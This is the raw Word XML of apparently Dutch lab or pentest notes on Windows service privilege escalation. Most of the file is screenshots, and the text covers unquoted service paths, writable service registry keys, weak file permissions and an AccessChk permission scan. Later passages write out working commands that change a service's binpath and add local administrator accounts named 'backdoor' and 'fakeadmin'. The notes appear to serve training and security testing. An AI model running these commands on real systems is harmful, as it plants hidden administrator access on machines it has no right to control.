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3F8A" w14:textId="0A0F4905" w:rsidR="00D45F8E" w:rsidRDefault="00B3568D">
      <w:r w:rsidRPr="00B3568D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0770F3BA" wp14:editId="44E4F525">
            <wp:extent cx="5760720" cy="4664075"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1288838394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8394" name="Afbeelding 1" descr="Afbeelding met tekst, schermopname, scherm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C40" w14:textId="6DF2E3BF" w:rsidR="00B3568D" w:rsidRDefault="00B3568D">
      <w:r w:rsidRPr="00B3568D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A181804" wp14:editId="69FE1D64">
            <wp:extent cx="5760720" cy="2324735"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1622772869" name="Afbeelding 1" descr="Afbeelding met tekst, nummer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72869" name="Afbeelding 1" descr="Afbeelding met tekst, nummer, software, Lettertyp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A15" w14:textId="53CDCEB4" w:rsidR="00CB5248" w:rsidRDefault="00CB5248">
      <w:r w:rsidRPr="00CB5248">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="197FA8A2" wp14:editId="667D79E9">
            <wp:extent cx="5760720" cy="3281680"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="179401078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10783" name="Afbeelding 1" descr="Afbeelding met tekst, schermopname, Lettertyp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17D6" w14:textId="39E1AB8B" w:rsidR="00B532C3" w:rsidRDefault="00B532C3">
      <w:r w:rsidRPr="00B532C3">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="217EBDAD" wp14:editId="4982962D">
            <wp:extent cx="5760720" cy="3026410"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1473988868" name="Afbeelding 1" descr="Afbeelding met tekst, software, Webpagina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8868" name="Afbeelding 1" descr="Afbeelding met tekst, software, Webpagina, Computerpictogra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2260" w14:textId="559F7C1E" w:rsidR="005E08FF" w:rsidRDefault="005E08FF">
      <w:r w:rsidRPr="005E08FF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6269657C" wp14:editId="5050100E">
            <wp:extent cx="5760720" cy="3851910"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="131147232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2323" name="Afbeelding 1" descr="Afbeelding met tekst, schermopname, software, computer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9132" w14:textId="79855D13" w:rsidR="00F92ABD" w:rsidRDefault="00F92ABD">
      <w:r w:rsidRPr="00F92ABD">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0C509F69" wp14:editId="0CEF8AAA">
            <wp:extent cx="5760720" cy="5143500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="164473740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37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32B2" w14:textId="3A8458F4" w:rsidR="00F92ABD" w:rsidRDefault="006C267D">
      <w:r w:rsidRPr="006C267D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="02554B2E" wp14:editId="6D9606A7">
            <wp:extent cx="5760720" cy="1664970"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1143983894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83894" name="Afbeelding 1" descr="Afbeelding met tekst, schermopname, nummer, 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5D82" w14:textId="518DED07" w:rsidR="00B128EC" w:rsidRDefault="00B128EC">
      <w:r w:rsidRPr="00B128EC">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4CCAF484" wp14:editId="0AF53F48">
            <wp:extent cx="5760720" cy="2136140"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="34830083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0835" name="Afbeelding 1" descr="Afbeelding met tekst, schermopname, Lettertyp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2C50" w14:textId="127FEEBA" w:rsidR="00B128EC" w:rsidRDefault="00B128EC">
      <w:r w:rsidRPr="00B128EC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">SC description is </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B128EC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ander</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B128EC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> commando.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B128EC">
        <w:t xml:space="preserve">Geen beschrijving is red </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B128EC">
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>lag</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A559C92" w14:textId="5CD8A5C4" w:rsidR="00B128EC" w:rsidRDefault="00B128EC">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B128EC">
        <w:t>Unquoted</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B128EC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B128EC">
        <w:t>path</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B128EC">
        <w:t xml:space="preserve"> + spaties = kan kwet</w:t>
      </w:r>
      <w:r>
        <w:t>sbaarheid zijn. Je kunt bijvoorbeeld in C:\Program files\UNQ service… gebruiken om bijvoorbeeld een common.exe zelf aan te maken in deze map. Vervolgens kun je de UNQ service starten en zo common.exe uitvoeren met rechten (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>priviledge</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>escalation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">). </w:t>
      </w:r>
      <w:r w:rsidR="00FD083C">
        <w:t>Dit kan niet in Program Files want dit is een beschermde locatie.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314FB376" w14:textId="66EEC02E" w:rsidR="00FD083C" w:rsidRDefault="00383040">
      <w:r w:rsidRPr="00383040">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="704FA06A" wp14:editId="2DCE7161">
            <wp:extent cx="5760720" cy="1898015"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="1256675317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5317" name="Afbeelding 1" descr="Afbeelding met tekst, schermopname, software, numm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E892" w14:textId="0F12C487" w:rsidR="00383040" w:rsidRDefault="00383040">
      <w:r w:rsidRPr="00383040">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5E0A1900" wp14:editId="3BD3286B">
            <wp:extent cx="5760720" cy="2504440"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="551242581" name="Afbeelding 1" descr="Afbeelding met tekst, software, nummer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2581" name="Afbeelding 1" descr="Afbeelding met tekst, software, nummer, Computerpictogram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39D" w14:textId="74E97C1E" w:rsidR="00383040" w:rsidRDefault="00383040">
      <w:r>
        <w:t>Je kunt een key (bin) aanpassen en laten verwijzen naar iets wat je zelf wilt of direct code toevoegen en de service starten. Bijvoorbeeld:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="196CE664" w14:textId="58063B0F" w:rsidR="00383040" w:rsidRPr="00CB5248" w:rsidRDefault="00383040">
      <w:r w:rsidRPr="00CB5248">
        <w:t>cmd.exe /c net user /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CB5248">
        <w:t>add</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CB5248">
        <w:t xml:space="preserve"> backdoor B@ckd00r123 &amp;&amp; net </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CB5248">
        <w:t>localgroup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CB5248">
        <w:t xml:space="preserve"> administrators backdoor /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CB5248">
        <w:t>add</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CB5248">
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FAC6BB2" w14:textId="77777777" w:rsidR="00113DC4" w:rsidRDefault="00113DC4"/>
    <w:p w14:paraId="479BFA47" w14:textId="2275E3AF" w:rsidR="00383040" w:rsidRPr="00383040" w:rsidRDefault="00383040">
      <w:r w:rsidRPr="00383040">
        <w:t>Wachtwoord moet aan lokaal b</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">eleid voldoen. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7053BE39" w14:textId="70B19888" w:rsidR="00117FCD" w:rsidRDefault="00383040">
      <w:r w:rsidRPr="00383040">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="68358FA4" wp14:editId="69D478B1">
            <wp:extent cx="3848637" cy="1705213"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1384380078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80078" name="Afbeelding 1" descr="Afbeelding met tekst, schermopname, Lettertype, lijn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4476" w14:textId="4E114779" w:rsidR="00383040" w:rsidRDefault="00383040">
      <w:r>
        <w:t xml:space="preserve">Dit lijkt fout te gaan maar is alleen een </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>callback</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> error.</w:t>
      </w:r>
      <w:r w:rsidR="00CE2815">
        <w:t xml:space="preserve"> De gebruiker wordt gewoon aangemaakt:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C159E9D" w14:textId="42ED0BED" w:rsidR="00CE2815" w:rsidRDefault="00CE2815">
      <w:r w:rsidRPr="00CE2815">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1AEF4B2E" wp14:editId="5F3C5C2F">
            <wp:extent cx="5760720" cy="1814830"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1758511291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1291" name="Afbeelding 1" descr="Afbeelding met tekst, Lettertype, schermopname, lijn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69A3" w14:textId="79558C03" w:rsidR="00CE2815" w:rsidRDefault="00CE2815">
      <w:r>
        <w:t xml:space="preserve">Dit account kun je gebruiken wanneer je gevraagd wordt om lokale admin credentials. Je logt er zelf niet mee in op de machine. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A9D0FB8" w14:textId="47258574" w:rsidR="00CE2815" w:rsidRDefault="00CE2815">
      <w:r>
        <w:t>.\backdoor (username)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE2E59F" w14:textId="5E6C17D9" w:rsidR="00383040" w:rsidRDefault="00113DC4">
      <w:r w:rsidRPr="00113DC4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="73DBC967" wp14:editId="39DBC39C">
            <wp:extent cx="5760720" cy="3439160"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="730628028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28028" name="Afbeelding 1" descr="Afbeelding met tekst, schermopname, software, nummer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8A7C" w14:textId="1F1DF6CD" w:rsidR="00113DC4" w:rsidRDefault="00113DC4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">File </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>permissions</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>. Je kunt zelf de .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>exe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> hernoemen en een eigen versie in de plaats zetten en uitvoeren.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="043972BA" w14:textId="61CA3F8C" w:rsidR="00113DC4" w:rsidRDefault="00113DC4">
      <w:r>
        <w:t>DMT service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171B09FA" w14:textId="50AB9CED" w:rsidR="00113DC4" w:rsidRDefault="00113DC4" w:rsidP="00113DC4">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Sysinternals</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> gedownload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0C24BD" w14:textId="55659878" w:rsidR="00113DC4" w:rsidRDefault="00113DC4" w:rsidP="00113DC4">
      <w:r>
        <w:t>Opnemen in rapport wat je download en of het wenselijk is dat je dit kan downloaden.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F94C55D" w14:textId="53A6E985" w:rsidR="00113DC4" w:rsidRDefault="001740CA" w:rsidP="00113DC4">
      <w:r w:rsidRPr="001740CA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="45596391" wp14:editId="61D5D51F">
            <wp:extent cx="5760720" cy="4234815"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="780793181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3181" name="Afbeelding 1" descr="Afbeelding met tekst, schermopname, Lettertype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1D62" w14:textId="1637CBFA" w:rsidR="001740CA" w:rsidRDefault="001740CA" w:rsidP="00113DC4">
      <w:r>
        <w:t>Derde permissieprobleem (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>insecure</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">). RW = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rewrite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> voor iedereen. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="085D01B7" w14:textId="1CDE0103" w:rsidR="001740CA" w:rsidRPr="00383040" w:rsidRDefault="001740CA" w:rsidP="00113DC4">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Accesschk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uwvqv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Everyone</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>” *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A704DC" w14:textId="77777777" w:rsidR="001740CA" w:rsidRDefault="001740CA" w:rsidP="001740CA">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Accesschk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">: De commando-oproep naar de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>AccessChk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> tool.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="167220D3" w14:textId="77777777" w:rsidR="001740CA" w:rsidRDefault="001740CA" w:rsidP="001740CA">
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uwvqv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>: Een combinatie van commando-opties:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3361FB45" w14:textId="77777777" w:rsidR="001740CA" w:rsidRDefault="001740CA" w:rsidP="001740CA">
      <w:r>
        <w:t>-u: Geeft aan dat de tool de machtigingen moet tonen die zijn toegekend aan gebruikers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F15DE2" w14:textId="77777777" w:rsidR="001740CA" w:rsidRDefault="001740CA" w:rsidP="001740CA">
      <w:r>
        <w:t xml:space="preserve">-w: Toont alleen </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>schrijfbaar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> objecten (bestanden/mappen/registers).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56AB7C72" w14:textId="77777777" w:rsidR="001740CA" w:rsidRDefault="001740CA" w:rsidP="001740CA">
      <w:r>
        <w:t>-v: Zorgt voor een uitgebreide output (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>verbose</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD1F6FC" w14:textId="77777777" w:rsidR="001740CA" w:rsidRDefault="001740CA" w:rsidP="001740CA">
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>qv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>: Staat voor '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>quiet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>verbose</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>'. Dit toont alleen objecten waar de gevraagde toegang is toegestaan, en toont toegangslijsten (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ACLs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>) in een verkorte vorm.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10FCE5A9" w14:textId="77777777" w:rsidR="001740CA" w:rsidRDefault="001740CA" w:rsidP="001740CA">
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Everyone</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": Specificeert dat de tool de toegangsrechten voor de "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Everyone</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>" (Iedereen) gebruikersgroep moet controleren.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51033C24" w14:textId="77777777" w:rsidR="001740CA" w:rsidRDefault="001740CA" w:rsidP="001740CA">
      <w:r>
        <w:t xml:space="preserve">*: Geeft aan dat de tool de toegangsrechten moet controleren voor alle objecten in de huidige map en </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>submappen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04271051" w14:textId="77777777" w:rsidR="001740CA" w:rsidRDefault="001740CA" w:rsidP="001740CA">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Wat doet dit commando?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="554941D2" w14:textId="1EE8C95C" w:rsidR="00B128EC" w:rsidRDefault="001740CA" w:rsidP="001740CA">
      <w:r>
        <w:t xml:space="preserve">Dit commando zal controleren en een lijst genereren van alle bestanden, mappen, en mogelijk andere objecten in de huidige directory (en </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>subdirectories</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>) waar de "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Everyone</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>" groep schrijfrechten heeft. Het zal een verkorte vorm van de toegangscontrolelijsten (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ACLs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>) tonen, wat kan helpen bij het identificeren van mogelijke beveiligingsrisico’s door ongepaste toegangsrechten.</w:t>
      </w:r>
      <w:r w:rsidR="00A13640">
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD6D569" w14:textId="77777777" w:rsidR="00A13640" w:rsidRDefault="00A13640" w:rsidP="001740CA"/>
    <w:p w14:paraId="7A832F86" w14:textId="3E3AC8AB" w:rsidR="00A13640" w:rsidRDefault="00A13640" w:rsidP="001740CA">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> query </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dmtsvc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="25E2A3B5" w14:textId="30291234" w:rsidR="00A13640" w:rsidRDefault="00A13640" w:rsidP="001740CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A13640">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A13640">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> config </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A13640">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dmtsvc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A13640">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A13640">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>binpath</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A13640">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>=”C:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>\temp\evilservice.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F845066" w14:textId="1F298304" w:rsidR="00A13640" w:rsidRPr="00A13640" w:rsidRDefault="00A13640" w:rsidP="001740CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> config </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dmtsvc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binpath</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>=”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/c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9F98CA" w14:textId="77777777" w:rsidR="001740CA" w:rsidRDefault="001740CA" w:rsidP="001740CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C037802" w14:textId="540074B0" w:rsidR="00A13640" w:rsidRDefault="004376EC" w:rsidP="001740CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004376EC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="308959E2" wp14:editId="70E92FF9">
            <wp:extent cx="5760720" cy="170815"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="118071434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14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D8CC" w14:textId="25D358C0" w:rsidR="004376EC" w:rsidRDefault="004376EC" w:rsidP="001740CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004376EC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="380074AC" wp14:editId="0488C9CC">
            <wp:extent cx="3905795" cy="4572638"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="413207287" name="Afbeelding 1" descr="Afbeelding met tekst, schermopname, scher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7287" name="Afbeelding 1" descr="Afbeelding met tekst, schermopname, scherm, nummer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2B0F" w14:textId="77777777" w:rsidR="004376EC" w:rsidRDefault="004376EC" w:rsidP="001740CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AB76566" w14:textId="49B6349A" w:rsidR="004376EC" w:rsidRDefault="004376EC" w:rsidP="001740CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004376EC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004376EC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004376EC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> /c cmd.exe /c net user /add </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004376EC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>fakeadmin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004376EC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> L3tm3!n &amp;&amp; net </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004376EC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>localgroup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004376EC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> administrators </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004376EC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>fakeadmin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004376EC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> /add"</w:t>
      </w:r>
    </w:p>
